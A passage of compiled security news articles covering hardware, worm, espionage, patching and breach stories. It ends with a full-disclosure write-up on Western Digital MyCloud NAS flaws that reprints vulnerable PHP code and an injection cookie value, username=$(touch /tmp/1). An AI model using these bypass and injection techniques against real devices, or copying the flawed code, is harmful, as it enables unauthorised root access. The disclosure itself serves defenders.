IoT devices at risk but also full-service computers. "This kind of attack could be devastating because it is relatively easy to perform," Dutertre says. And while Cui and Housley's research exists strictly as a proof of concept, they caution that other groups may have capabilities that far exceed academia's. “We don’t think we’re the farthest along in this research,” Cui says. “We’ve been doing this on our off time as a side project. If somebody wanted to put significant resource into this, they would certainly be ahead of us." < Here >
  14. Even if a vape pen seems like it's simply charging, it could actually be compromising your computer, security researchers warn. Security researchers have demonstrated how e-cigarettes can easily be modified into tools to hack computers. With only minor modifications, the vape pen can be used by attackers to compromise the computers they are connected to - even if it seems just like they are charging. Giving a presentation at BSides London, Ross Bevington showed how an e-cigarette could be used to attack a computer by fooling the computer to believe it was a keyboard or by tampering with its network traffic. While Mr Bevington's particular form of attack required the victim's machine to be unlocked, that was not the case for all attacks. "PoisonTap is a very similar style of attack that will even work on locked machines," Mr Bevington told Sky News. Another hacker and researcher known as Fouroctets published a proof-of-concept video which showed arbitrary commands being entered into his unlocked laptop just after plugging in a vape pen to charge. Speaking to Sky News, Fouroctets said he had modified the vape pen by simply adding a hardware chip which allowed the device to communicate with the laptop as if it were a keyboard or mouse. A pre-written script that was saved on the vape made Windows open up the Notepad application and typed "Do you even vape bro!!!!" The script could have been modified to do something much more malicious, however. Fouroctets showed Sky News how, using less than 20 lines of code, the computer could be made to download an arbitrary and potentially dangerous file and run it. While e-cigarettes could be used to deliver malicious payloads to machines, there is usually very little space available on them to host this code. "This puts limitations on how elaborate a real attack could be made," said Mr Bevington. "The WannaCry malware for instance was 4-5MB, hundreds of times larger than the space on an e-cigarette. That being said, using something like an e-cigarette to download something larger from the Internet would be possible." The best way to protect against these kind of attacks is to ensure that your machine has updated its security patches, said Mr Bevington, and to "have a good password and lock your machine when you leave it". "If you run a business you should invest in some kind of monitoring solution that can alerted your security team when something like this attack occurs," he said. "In all cases, be wary if someone wants to plug something into your machine." < Here >
  15. Researchers have detected a new worm that is spreading via SMB, but unlike the worm component of the WannaCry ransomware, this one is using seven NSA tools instead of two. The worm's existence first came to light on Wednesday, after it infected the SMB honeypot of Miroslav Stampar, member of the Croatian Government CERT, and creator of the sqlmap tool used for detecting and exploiting SQL injection flaws. EternalRocks uses seven NSA tools The worm, which Stampar named EternalRocks based on worm executable properties found in one sample, works by using six SMB-centric NSA tools to infect a computer with SMB ports exposed online. These are ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY, which are SMB exploits used to compromise vulnerable computers, while SMBTOUCH and ARCHITOUCH are two NSA tools used for SMB reconnaissance operations. Once the worm has obtained this initial foothold, it then uses another NSA tool, DOUBLEPULSAR, to propagate to new vulnerable machines. Origin of the EternalRocks name The WannaCry ransomware outbreak, which affected over 240,000 victims, also used an SMB worm to infect computers and spread to new victims. Unlike EternalRocks, WannaCry's SMB worm used only ETERNALBLUE for the initial compromise, and DOUBLEPULSAR to propagate to new machines. EternalRocks is more complex but less dangerous As a worm, EternalRocks is far less dangerous than WannaCry's worm component, as it currently does not deliver any malicious content. This, however, does not mean that EternalRocks is less complex. According to Stampar, it's actually the opposite. For starters, EternalRocks is far more sneaky than WannaCry's SMB worm component. Once it infects a victim, the worm uses a two-stage installation process, with a delayed second stage. During the first stage, EternalRocks gains a foothold on an infected host, downloads the Tor client, and beacons its C&C server, located on a .onion domain, the Dark Web. Only after a predefined period of time — currently 24 hours — does the C&C server respond. The role of this long delay is most probably to bypass sandbox security testing environments and security researchers analyzing the worm, as very few will wait a full day for a response from the C&C server. No kill switch domain Additionally, EternalRocks also uses files with identical names to the ones used by WannaCry's SMB worm, in another attempt to fool security researchers into misclassifying it. But unlike WannaCry, EternalRocks does not include a kill switch domain, the Achille's heel that security researchers used to stop the WannaCry outbreak. After the initial dormancy period expires and the C&C server responds, EternalRocks goes into the second stage of its installation process and downloads a second stage malware component in the form of an archive named shadowbrokers.zip. The name of this file is pretty self-explanatory, as it contains NSA SMB-centric exploits leaked by the Shadow Brokers group in April 2017. The worm then starts a rapid IP scanning process and attempts to connect to random IP addresses. The configuration files for NSA tools found in the shadowbrokers.zip archive EternalRocks could be weaponized in an instant Because of its broader exploit arsenal, the lack of a kill switch domain, and because of its initial dormancy, EternalRocks could pose a serious threat to computers with vulnerable SMB ports exposed to the Internet, if its author would ever decide to weaponize the worm with ransomware, a banking trojan, RATs, or anything else. At first glance, the worm seems to be an experiment, or a malware author performing tests and fine-tuning a future threat. This, however, does not mean EternalRocks is harmless. Computers infected with this worm are controllable via C&C server commands and the worm's owner could leverage this hidden communications channel to send new malware to the computers previously infected by EternalRocks. Furthermore, DOUBLEPULSAR, an NSA implant with backdoor features, remains running on PCs infected with EternalRocks. Unfortunately, the worm's author has not taken any measures to protect the DOUBLEPULSAR implant, which runs in a default unprotected state, meaning other threat actors could use it as a backdoor to machines infected by EternalRocks, by sending their own malware to those PCs. IOCs and more info on the worm's infection process are available in a GitHub repo Stampar set up a few days ago. An SMB free-for-all Currently, there are multiple actors scanning for computers running older and unpatched versions of the SMB services. System administrators have already taken notice and started patching vulnerable PCs or disabling the old SMBv1 protocol, slowly reducing the number of vulnerable machines that EternalRocks can infect. Furthermore, malware such as Adylkuzz also shuts down SMB ports, preventing further exploitation from other threats, also contributing to reducing the number of potential targets for EternalRocks and other SMB-hunting malware. Reports from Forcepoint, Cyphort, and Secdo detail other threats currently targeting computers with SMB ports. Nonetheless, the faster system administrators patch their systems the better. "The worm is racing with administrators to infect machines before they patch," Stampar told Bleeping Computer in a private conversation. "Once infected, he can weaponize any time he wants, no matter the late patch." Article source
  16. Hackers managed to inject the NFTC website with malicious code in a watering hole attack Nation state level hackers based out of China have targeted directors at some of the world's largest firms by compromising the website of a global trade lobby group. The sophisticated nature of the campaign against the Washington-based National Foreign Trade Council has led cybersecurity researchers at Fidelis to the conclusion that the attacks were carried out by the Chinese APT10 hacking group. It's the second time in a week that an APT10 campaign has come to light, with PwC also detailing how the group has been targeting managed IT services providers across the globe in order to steal sensitive data. The latest campaign, dubbed Operation Tradesecret, has been detailed in a new report, and has come to light just ahead of US President Donald Trump's meeting with Chinese President Xi Jinping. The two leaders are expected to discuss cyber warfare and cybersecurity. The number of cyberattacks emerging from China has declined recently, although the incidents that are taking place are more sophisticated and targeted. Fidelis security researchers say specific pages of NFTC's website were injected with a watering hole attack link, designed to run malware to compromise a very precise set of targets: those registering for specific meetings at the NFTC, such as a board of directors meeting in Washington DC. The targeted individuals hold key roles in some of the largest corporations in the world and gaining access to their personal data and sensitive corporate information would be a boon for hackers looking for ways to steal company secrets. This particular campaign took place between February 27 and March 1, with malicious links on the NFTC website serving Scanbox malware, a well-known web reconnaissance tool that has been used in cyberespionage campaigns dating back to at least 2014. It has also been associated with campaigns linked to the Chinese government. Cyberespionage capabilities of Scanbox -- which was also used in attacks against the US Office of Personnel Management and Anthem Healthcare -- include monitoring which websites were viewed by the victim as well as their operating system, screen size, and location, along with keylog monitoring. The latter potentially enables attackers to make off with login details and passwords for internal networks and even compromise others using phishing attacks. Indeed, Fidelis notes how the waterhole attack against the National Foreign Trade Council is likely to be a precursor for an upcoming sustained campaign against targets -- and those affected should be mindful. "The reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that such personnel will be subject to further targeted attempts to compromise them -- for example, through a spearphishing campaigns," the report warns. The malicious link itself was removed from the NFTC website on March 2 and Fidelis briefed the organisation about the incident shortly after it was discovered. The APT10 hacking collective has been focusing on espionage since 2009 and has evolved from targeting US defence firms, as well as the technology and telecommunications sectors, to organisations in multiple industries across the globe. The group was behind the Poison Ivy malware family, and today uses custom tools capable of compromising organisations and their customers, as well as stealing large amounts of data. Source
  17. VMware has released critical security patches for vulnerabilities demonstrated during the recent Pwn2Own hacking contest that could be exploited to escape from the isolation of virtual machines. The patches fix four vulnerabilities that affect VMware ESXi, VMware Workstation Pro and Player and VMware Fusion. Two of the vulnerabilities, tracked as CVE-2017-4902 and CVE-2017-4903 in the Common Vulnerabilities and Exposures database, were exploited by a team from Chinese internet security firm Qihoo 360 as part of an attack demonstrated two weeks ago at Pwn2Own. The team's exploit chain started with a compromise of Microsoft Edge, moved to the Windows kernel, and then exploited the two flaws to escape from a virtual machine and execute code on the host operating system. The researchers were awarded $105,000 for their feat. Pwn2Own is an annual hacking contest organized by Trend Micro's Zero Day Initiative (ZDI) program that runs during the CanSecWest conference in Vancouver, British Columbia. Researchers receive cash prizes for demonstrating zero-day -- previously unknown -- exploits against browsers, operating systems and other popular enterprise software programs. This year, the contest organizers added prizes for exploits in hypervisors like VMware Workstation and Microsoft Hyper-V and two teams stepped up to the challenge. The second team, made up of researchers from the Keen Lab and PC Manager divisions of internet services provider Tencent, exploited the two other flaws patched by VMware this week: CVE-2017-4904 and CVE-2017-4905. The latter is a memory information leak vulnerability that is rated only as moderate, but which could help hackers pull off a more serious attack. Users are advised to update VMware Workstation to version 12.5.5 on all platforms and VMware Fusion to version 8.5.6 on macOS (OS X). Individual patches are also available for ESXi 6.5, 6.0 U3, 6.0 U2, 6.0 U1 and 5.5, where applicable. Virtual machines are often used to create throw-away environments that pose no threat to the main operating system in case of compromise. For example, malware researchers execute malicious code and visit suspicious URLs inside virtual machines to observe their behavior. Companies also run many applications inside virtual machines to limit the potential impact if they're compromised. One of the main goals of hypervisors like VMware Workstation is to create a barrier between the guest operating system that runs inside the virtual machine and the host OS where the hypervisor runs. That's why VM escape exploits are highly prized among hackers. Source
  18. FBI Director James Comey (left) testifies in front of the House Intelligence Committee on Monday regarding Russian hacking during the 2016 election. The agency's director, James Comey, confirms the FBI is looking into any possible ties between the president's campaign and the Russian government. In a rare move, the FBI confirmed that it is investigating whether Russian hackers had any links to President Trump's election team. Citing "unusual circumstances," FBI Director James Comey said that the bureau is looking into whether Trump's campaign worked with Russian officials during the 2016 election. "I have been authorized by the Department of Justice to confirm that the FBI, as part of our counterintelligence mission, is investigating the Russian government's efforts to interfere in the 2016 presidential election," Comey testified at a House committee hearing on Monday. "That includes investigating the nature of any links between individuals associated with the Trump campaign and the Russian government, and whether there was any coordination with the campaign and Russia's efforts." These are unusual circumstances indeed. Worries about Russian hacks plagued the US presidential election and its aftermath, with US intelligence agencies accusing Russia of meddling in the race for the White House. The House Intelligence Committee is investigating how the cyberattacks happened and how to protect the nation's democratic processes from interference in the future. The breaches included hacking emails from the Democratic National Committee, Democratic candidate Hillary Clinton and her campaign manager, John Podesta. Comey had earlier testified before the House Intelligence committee concerning Russian hacks during the election, revealing there were no attacks against the Trump campaign or the Republican National Committee. During the campaign, Donald Trump publicly urged Russia to help turn up Clinton's emails. Members of the Trump administration, including attorney general Jeff Sessions, former national security adviser Michael Flynn and Secretary of State Rex Tillerson, have also faced controversy for ties to Russian officials. The Obama administration in late December retaliated against Russia, imposing sanctions over the cyberattacks even as Russian officials continue to deny any involvement in the hacks. Russia's relationships with the US has been on shaky ground since. Comey revealed that the FBI has been investigating Russian influence on the 2016 election since last July, when hackers apparently first infiltrated the DNC. It remains unclear when the investigation will end. During the hearing, Comey also rebutted President Trump's tweets that the Obama administration ordered a wiretap on Trump Tower during the campaign. That echoed House Intelligence committee chairman Devin Nunes and the Justice Department's findings. "I have no information that supports those tweets, and we have looked carefully inside the FBI," Comey said. The National Security Agency director Michael Rogers also denied Trump's claims during the hearing. Source
  19. Your Apple iCloud account may be open to attacks. Worried about hackers destroying your iCloud music, pictures, and documents? Here are three things you should do right now. Maybe the London-based hacker group -- which goes by the name "Turkish Crime Family" -- doesn't have access to 250-million Apple iCloud account names and passwords. But they do have access to some indeterminate number of accounts, and that's more than enough reason to exercise caution: Protect your iCloud password and data today or risk losing it tomorrow. Here's how to do it. Back up vulnerable data First, you need to back up your iCloud data. Yes, I know Apple's idea was you could use iCloud to back up your Apple device data, and that's fine, but it's iCloud itself we're worried about today. For your iPhone, iPad, or iPod, the easiest way to do this is to back up your device's files to your Mac or PC with an iTunes backup. Plug your device into your Mac or PC with iTunes on. In iTunes' top left-hand corner, under the play controls, there's a tiny phone icon. Click here and it will take you to your device's menu. Click on Summary in the left-hand column. You will be presented with three boxes. Choose Select Backups. Choose to automatically or manually back-up your device. If you choose automatic, every time you plug your gadget in, iTunes will start to back it up. Backing up your Apple device locally, and not just to iCloud, is a good idea The only problem here is that iTunes doesn't back everything up. For example, it won't back up your Apple Pay information and settings, photos already on iCloud, or purchased iTunes and App Stores content. So, to be safe, you really must change and secure your password. Change your passwords Apple could help here -- and not just by paying off the Turkish Crime Family. Other major sites -- like Amazon, Netflix, and LinkedIn -- buy cracked password lists, and use one-way hashing matches to check for existing passwords. They then reset vulnerable passwords and ask users to switch passwords. Apple hasn't done that, but it should consider doing it, given just how large the threat appears to be. Since Apple isn't doing this, it's up to you. One thing that has always annoyed me is that Apple talks as if your Apple ID and iCloud ID are different. They're not. They're the same, and they use the same password. To change your Apple ID password, sign in to your Apple ID account page with any web browser and follow the instructions to reset your password. I changed mine using Google Chrome from a Mint Linux system. Your new Apple ID password must contain at least eight characters, a number, an uppercase letter, and a lowercase letter. You also can't use spaces, the same character three times in a row, your Apple ID, or a password you've used in the last year. Whatever you do, do NOT use dumb passwords such as "abcdefgh," "qwerty," or "password." The easiest way to create a secure password that won't try your memory is to use passphrases instead of passwords. Instead of working your nerves into a frenzy trying to memorize what the cat wrote when he jumped on the keyboard (e.g. "sdf9usdf"), use an easy-to-remember but nonsensical phrase instead. For example, "Plump/Trotting Pups:" or "UNC?Win!Duke?Lose!" or "AC!DC!Tesla!Edison?" These are easy to recall and hard for crackers to break. Once you've changed your password, you'll need to change it on all your Apple devices. Then, you're going to want to add another layer of protection: Two-factor authentication (2FA). 2FA Apple's 2FA is clunky, but it still does a great job of protecting your account. For additional protection, turn on Apple's two-factor authentication. When you activate 2FA, you can access your account only from trusted devices such as your iPhone, iPad, or Mac. When you want to sign in to a new device for the first time, you'll need to provide two pieces of information. These are your Apple ID password and the six-digit verification code that's automatically displayed on your trusted devices. To use Apple 2FA, you'll also need a trusted phone number so you can receive verification codes. To add a trusted phone number, take the following steps: Go to your Apple ID account page Sign in with your Apple ID Go to the Security section and click Edit Click Add a Trusted Phone Number and enter the phone number Now, you're ready for 2FA. For a trusted device, you need an iPhone, iPad, or iPod touch with iOS 9 and later, or you need a Mac running OS X El Capitan or later that you've already signed into with 2FA. To turn on Apple 2FA, take the following steps. On your iPhone, iPad, or iPod touch with iOS 9 or later: Go to Settings > iCloud > tap your Apple ID Tap Password & Security Tap Turn on Two-Factor Authentication On your Mac with OS X El Capitan or later: Go to Apple menu > System Preferences > iCloud > Account Details Click Security Click Turn on Two-Factor Authentication Yes, this can be a lot of work. On the other hand, how much work would it take you to replace your important photos, music, books, or documents if your Apple iCloud account goes up in smoke? Take the time, do it now. You'll be glad you did. Source
  20. Apple has received a ransom threat from a hacking group claiming to have access to data for up to 800 million iCloud accounts. The hackers, said to be a London-based group called the "Turkish Crime Family," have threatened to reset passwords and remotely wipe the iPhones of millions of iCloud users if Apple fails to hand over a total of US$700,000. They have given the company an ultimatum to respond by April 7. Apple reportedly has denied that the group succeeded in hacking its systems, maintaining that it obtained the email addresses and passwords from previously compromised third-party services. Apple is working with law enforcement on the threats. The data set in the iCloud hack matches the data found in the 2012 hack of 117 million accounts on LinkedIn, according to some published reports. However, the Turkish Crime Family strongly denied that in a message to TechNewsWorld on Friday. Correcting the Message The initial reports of a ransom demand of just $75,000 were incorrect, the group said in response to our email query. It actually demanded $100,000 for each of its seven members, plus "extra stuff from Apple that are worth more to us than money," which it promised Apple it would keep secret. The group also told TechNewsWorld that the only member based in London is Kerem Albayrek, who is facing charges related to listing a hacked Yahoo database for sale. It claimed that its iCloud ransom demands were in part to spread awareness of Albayrek, as well as of Karim Baratov, a Canadian resident charged earlier this month, along with a second hacker and two Russian FSB agents, in the 2014 breach of 500 million Yahoo account holders. The group told TechNewsWorld that it showed Apple scan logs that contain 800 million iCloud accounts, and that Apple claimed the data had come from outside sources. The group said it planned to launch a website that would list iCloud user names, last names, dates of birth and a captcha of their current location from an iCloud app. The site will not disclose passwords initially, the group said, but it would do so "most probably in the future." Shaking Down Apple The Turkish Crime Family threat should be taken seriously, said Pierluigi Paganini, a cybersecurity analyst and member of the Cyber Group G7 2017 Summit in Italy. "I consider the threat is credible, even if it is quite impossible to know the exact number of iCloud credentials in the hands of hackers," he told TechNewsWorld. The group is known in the hacking underground for the sale of stolen databases, Paganini said. The group reportedly has approached several media outlets directly; it told TechNewsWorld that it had been in contact with five. However, it is unlikely that the group's efforts to stir public pressure against Apple will be effective, noted Mark Nunnikhoven, vice president for cloud research at Trend Micro, in an online post. Apple is too large and has too many resources to give in to public pressure, he pointed out. The group's demands are similar to a shakedown in the physical world, in which criminals demand monthly payments to "protect" a business, Nunnikhoven noted. "In the digital world, the pressures that make victims pay (e.g. keeping your store in one piece) don't apply," Nunnikhoven wrote. "With iCloud accounts, Apple has the ultimate safety valve ... they control the infrastructure behind the accounts," he added. "Which removes most of the pressure points criminals could use." There is no evidence of state involvement in this cyberthreat, Nunnikhoven told TechNewsWorld. However, there is "mounting evidence that this is a group whose eyes are bigger than their stomachs," he suggested. "Selling credentials on the underground is rather commonplace. Attempting to extort one of the biggest companies on the planet with poor quality data is quite another." Credible Threat A report in ZDNet appeared to lend credence to some of the hacking group's claims, however. The group provided 54 credentials to the publication, which were verified as authentic based on a check of the password reset function. Most of the accounts were outdated, but 10 people did confirm to the publication that the obtained passwords were legitimate and that they since had changed them. Those 10 people were living in the UK, and had UK mobile numbers. Trend Micro is urging iCloud users to protect their accounts by using two-factor authentication, and also to use a password manager. A password manager helps users create unique passwords for every account and stores them remotely so that hackers cannot access one or two accounts and thereby gain access to many more. The FBI declined to comment for this story. Apple officials did not respond to our request to comment, and a Yahoo spokesperson was not immediately available. Source
  21. Most Android phones are don't have the latest security patch -- despite efforts by Google to distribute software fixes monthly via phone carriers -- researchers at Skycure found. A cybersecurity company found that 71 percent of Android users on major US carriers are easy targets for hackers. Chances are, your Android phone would be easy pickings for hackers. That's according to research released Thursday by cybersecurity company Skycure, which found that 71 percent of Android phones on the five major US carriers haven't been patched with the latest security updates. That could be because users haven't installed updates, or because they haven't received them from carriers. The report highlights the risks posed by not updating smartphones, and the challenges Google faces in delivering security updates to Android users. Why should Android users be worried about staying up to date on their security updates? In the hacking world, security updates show bad guys all the ways that phones, computers or other devices can be compromised. For example, an Android security update in December patched a flaw nick-named "Dirty Cow" that could have let hackers get root privileges -- essentially the keys to the kingdom -- on an Android phone. So if you don't (or can't) update, hackers can build tools to break into your phone. Patching makes these hacking tools useless. "Malware, network attacks and advanced exploitation campaigns many times depend on unpatched vulnerabilities to be successful," Yair Amit, co-founder and chief technical officer at Skycure, said in a statement. The carriers in the Skycure study are T-Mobile, MetroPCS, AT&T, Verizon and Sprint. T-Mobile (which merged with MetroPCS in 2013) didn't immediately provide a comment. Sprint, Verizon and AT&T didn't immediately respond to requests for comment. Google declined to respond to the Skycure report, but a spokesman pointed to its report published Wednesday on Android security, which gave details on the company's efforts to distribute monthly Android security updates. These updates have to first go to carriers like those listed in the Skycure report before they can be sent to users' phones. "We released monthly Android security updates throughout [2016] for devices running Android 4.4.4 and up -- that accounts for 86.3 percent of all active Android devices worldwide," members of the Android security team wrote in a blog post about the report on Wednesday. The report also said the company improved its ability to stop dangerous apps from getting onto the Google Play store and then to users' phones. But Android acknowledged there was "a lot of room for improvement" in its security update process. "About half of devices in use at the end of 2016 had not received a platform security update in the previous year," members of the Android security team wrote in their blog post. Source
  22. Police officers push back demonstrators as they protest against US President Donald Trump in Washington, DC, on January 20, 2017. Court papers say data is being extracted from 100 locked phones seized during arrests at anti-Trump protests. Prosecutors are trying to pull data from 100 locked phones seized during arrests made in Washington, DC on Inauguration Day, according to court papers filed Wednesday. Prosecutors said they have search warrants to extract data from the phones, which were seized by law enforcement officers on January 20 from 214 individuals arrested on felony rioting charges related to demonstrations protesting the inauguration of Donald Trump, according to a BuzzFeed report. The filing suggests that even though the phones are locked prosecutors have successfully copied data from them, although it doesn't describe their methods. Prosecutors said in the filing they expect to "produce all of the data from the searched [phones] in the next several weeks." Wednesday's filing comes amid a mounting war of words between tech companies and policy makers, who contend that terrorist groups are benefiting from encryption, the technology that jumbles communications and files so that only the intended recipient can read them. Tech companies have become increasingly diligent about including encryption in products and services in the wake of revelations about US government surveillance programs from documents leaked by former NSA contractor Edward Snowden. Apple's iPhone was at the center of a legal back-and-forth between the government and Apple last year after the December 2015 attack that left 14 people dead. The government wanted Apple to write new software that would unlock the phone and make its data readable, but Apple refused, saying that weakening the encryption would potentially leave other iPhone users at risk. In a surprise revelation in March 2016, the Department of Justice said an unnamed outside party helped agents break into an iPhone 5C that was used by shooter Syed Farook. However, the agency wouldn't disclose exactly how the hacker got into the phone. The data extracted from protesters' phones includes personal information irrelevant to the charges, so prosecutors are seeking a court order that would prohibit defense lawyers from copying or reproducing information unless it's relevant to the defense of their client. Representatives for the US Attorney's Office for the District of Columbia, which filed the papers Wednesday in the DC Superior Court, did not immediately respond to a request for comment. Source
  23. Hacking the Western Digital MyCloud NAS Sometimes at Exploitee.rs, we look for fun devices to hack and sometimes the devices find us. Today we’re going to talk about a recent time where we found ourselves in the latter situation and our experience with the Western Digital series of Networked Attached Storage devices. In the middle of last year I (Zenofex) began looking for a NAS that provided hardware decoding through my currently prefered media player, Plex. After a bit of research I ordered a Western Digital “MyCloud” PR4100. This device met all the requirements of what I was looking for and came highly recommended by a friend. After adding the NAS to my network and visiting the device’s admin page for the first time, I grew weary of adding a new device to my network without giving it a proper audit. So, I logged in, enabled SSH access, and looked at how the web server functionality of the device worked. Login Bypass I quickly found the first bug that shocked me, this bug was based on code that performed a user login check but did so using cookies or PHP session variables. Using cookies for authentication isn’t necessarily a bad thing, but the way that the Western Digital MyCloud interface uses them is the problem. Examine the code below. /lib/login_checker.php function login_check() { $ret = 0; if (isset($_SESSION['username'])) { if (isset($_SESSION['username']) && $_SESSION['username'] != "") $ret = 2; //login, normal user if ($_SESSION['isAdmin'] == 1) $ret = 1; //login, admin } else if (isset($_COOKIE['username'])) { if (isset($_COOKIE['username']) && $_COOKIE['username'] != "") $ret = 2; //login, normal user if ($_COOKIE['isAdmin'] == 1) $ret = 1; //login, admin } return $ret; } The above code contains a function called “login_check”, this function is used by all of the backend PHP scripts and is used to verify pre-authenticated users. The above code has two paths, one which involves checking the session values for “username” and “isAdmin” and another (if the prior fails) attempts to complete the same process but with cookies. Because cookies are supplied by the user, the requirements that the scripts are looking for can be met by the attacker. The above process for sessions and cookies is summed up as follows. “username” variable is set and is not empty – User is logged in as a normal privileged user. “isAdmin” variable is set to 1 – User is logged in as an administrator. This means that any time there is a login check within the PHP scripts, an attacker is able to bypass the check by supplying 2 specially crafted cookie values. During the process of writing up my findings a new firmware was rolled out patching the above bug. However, this patch introduced a new vulnerability which had the same consequences as the original (prior to the update). Below is the current version including the fixed code. /var/www/web/lib/login_checker.php 20 function login_check() 21 { 22 $ret = 0; 23 24 if (isset($_SESSION['username'])) 25 { 26 if (isset($_SESSION['username']) && $_SESSION['username'] != "") 27 $ret = 2; //login, normal user 28 29 if ($_SESSION['isAdmin'] == 1) 30 $ret = 1; //login, admin 31 } 32 else if (isset($_COOKIE['username'])) 33 { 34 if (isset($_COOKIE['username']) && $_COOKIE['username'] != "") 35 $ret = 2; //login, normal user 36 37 if ($_COOKIE['isAdmin'] == 1) 38 $ret = 1; //login, admin 39 40 if (wto_check($_COOKIE['username']) === 0) //wto check fail 41 $ret = 0; 42 } 43 44 return $ret; 45 } 46 ?> In the updated version of the code, a call to the new method “wto_check()” is made (line 40). This function runs a binary on the device with the client supplied username as an argument along with the user’s IP address. If the user is currently logged in and hasn’t timed out the value 1 is returned, otherwise 0 is returned (indicating the user isn’t logged in). The code for the “wto_check()” method can be found below. /var/www/web/lib/login_checker.php 3 /* 4 return value: 1: Login, 0: No login 5 */ 6 function wto_check($username) 7 { 8 if (empty($username)) 9 return 0; 10 11 exec(sprintf("wto -n \"%s\" -i '%s' -c", escapeshellcmd($username), $_SERVER["REMOTE_ADDR"]), $login_status); 12 if ($login_status[0] === "WTO CHECK OK") 13 return 1; 14 else 15 return 0; 16 } 17 18 /* ret: 0: no login, 1: login, admin, 2: login, normal user */ 19 In the above you can see that on line 11 the command is formatted to include the username and IP address as arguments to the “wto” binary. The problem with the above is the incorrect use of the PHP method “escapeshellcmd()” which, in its intended usage, handles an entire command string, and not just an argument. This is because the “escapeshellcmd()” function does not escape quotes and therefore allows an attacker the ability to break out of the encapsulating quotes (in our case for the “-n” argument), allowing for new arguments to be supplied to the binary. Because of this, instead of actually checking if the user is logged in, we can add new arguments and log the user in ourselves. Although we do not believe simply verifying that the user is already logged in by checking an IP address and login timeout is sufficient. The programmer who wrote this code should have used “escapeshellarg()”, which is intended to filter independent binary arguments and which does filter out quotes. Using “escapeshellarg()” as opposed to the currently used “escapeshellcmd()” would have at least prevented this attack from working. Command Injection Bugs A majority of the functionality of the WDCloud web interface is actually handled by CGI scripts on the device. Most of the binaries use the same pattern, they obtain post/get/cookie values from the request, and then use the values within PHP calls to execute shell commands. In most cases, these commands will use the user supplied data with little or no sanitization. For example, consider the following code from the device. php/users.php 15 $username = $_COOKIE['username']; 16 exec("wto -n \"$username\" -g", $ret); The code above assigns a value from the COOKIE superglobal variable, which contains array indexes for cookies submitted from the request, to the local variable “$username”. This value is then immediately used in a PHP “exec()” call as an argument to the local “wto” binary. Since there is no sanitization, using a username value like username=$(touch /tmp/1) turns the existing exec command into wto -n "$(touch /tmp/1)" -g and executes the user supplied command within. Because the argument is encapsulated with double quotes and we use the “$(COMMANDHERE)” syntax, the command “touch /tmp/1” is executed prior to the execution of the “wto” binary and the return value of which is used as its “-n” argument. This basic pattern resulting in a command injection vulnerability is used multiple times within the many scripts used by the web interface. While some may have normally been prevented by authentication being required, that restriction is overcome by the authentication bypass mentioned above. Also, it is important to note that all commands executed through the web interface are done so as the user the web-server is running as, which, in this case is root. Other Errata While you may think that the above bugs are severe, there are a number of other errors within the web interface with some being as simple as the normal authentication being commented out: addons/ftp_download.php 6 //include ("../lib/login_checker.php"); 7 // 8 ///* login_check() return 0: no login, 1: login, admin, 2: login, normal user */ 9 //if (login_check() == 0) 10 //{ 11 // echo json_encode($r); 12 // exit; 13 //} And others being more functionality specific, like the following example of a bug allowing a non-authenticated user the ability to upload files onto the myCloud device. addons/upload.php 2 //if(!isset($_REQUEST['name'])) throw new Exception('Name required'); 3 //if(!preg_match('/^[-a-z0-9_][-a-z0-9_.]*$/i', $_REQUEST['name'])) throw new Exception('Name error'); 4 // 5 //if(!isset($_REQUEST['index'])) throw new Exception('Index required'); 6 //if(!preg_match('/^[0-9]+$/', $_REQUEST['index'])) throw new Exception('Index error'); 7 // 8 //if(!isset($_FILES['file'])) throw new Exception('Upload required'); 9 //if($_FILES['file']['error'] != 0) throw new Exception('Upload error'); 10 11 $path = str_replace('//','/',$_REQUEST['folder']); 12 $filename = str_replace('\\','',$_REQUEST['name']); 13 $target = $path . $filename . '-' . $_REQUEST['index']; 14 15 //$target = $_REQUEST['folder'] . $_REQUEST['name'] . '-' . $_REQUEST['index']; 16 17 move_uploaded_file($_FILES['file']['tmp_name'], $target); 18 19 20 //$handle = fopen("/tmp/debug.txt", "w+"); 21 //fwrite($handle, $_FILES['file']['tmp_name']); 22 //fwrite($handle, "\n"); 23 //fwrite($handle, $target); 24 //fclose($handle); 25 26 // Might execute too quickly. 27 sleep(1); The above code consists of no checks for authentication and, when called will simply retrieve the uploaded file contents and use the user supplied path to determine where to place the new file. Beyond the bugs listed in this blog post, our wiki is full of bugs we’ve found within the MyCloud web interface. Our general goal at Exploitee.rs is to get bugs fixed as quickly as possible. However, the large number of severe findings means that we may need to re-evaluate the product after the vendor has properly fixed the released vulnerabilities. Responsible Disclosure At Exploitee.rs, we normally attempt to work with vendors to ensure that vulnerabilities are properly released. However, after visiting the Pwnie Awards at the last BlackHat Vegas, we learned of the vendor’s reputation within the community. In particular, this vendor won a “Pwnie for Lamest Vendor Response” in a situation where the vendor ignored the severity of a set of bugs reported to them. Ignoring these bugs would leave the vulnerable devices online for longer periods while responsible disclosure is worked out. Instead we’re attempting to alert the community of the flaws and hoping that users remove their devices from any public facing portions of their networks, limiting access wherever possible. Through this process, we’re fully disclosing all of our research and hoping that this expedites the patches to users’ devices. Bugs Found Statistics 1 x Login Bypass 1 x Arbitrary File Write 13 x Unauthenticated Remote Command Execution Bugs 70 x Authentication Required Command Execution Bugs* *”Authentication Required” bugs can be reached with the login bypass bug. Scope Most, if not all, of the research can be applied to the entire series of Western Digital MyCloud products. This includes the following devices: My Cloud My Cloud Gen 2 My Cloud Mirror My Cloud PR2100 My Cloud PR4100 My Cloud EX2 Ultra My Cloud EX2 My Cloud EX4 My Cloud EX2100 My Cloud EX4100 My Cloud DL2100 My Cloud DL4100 Video Demo Source
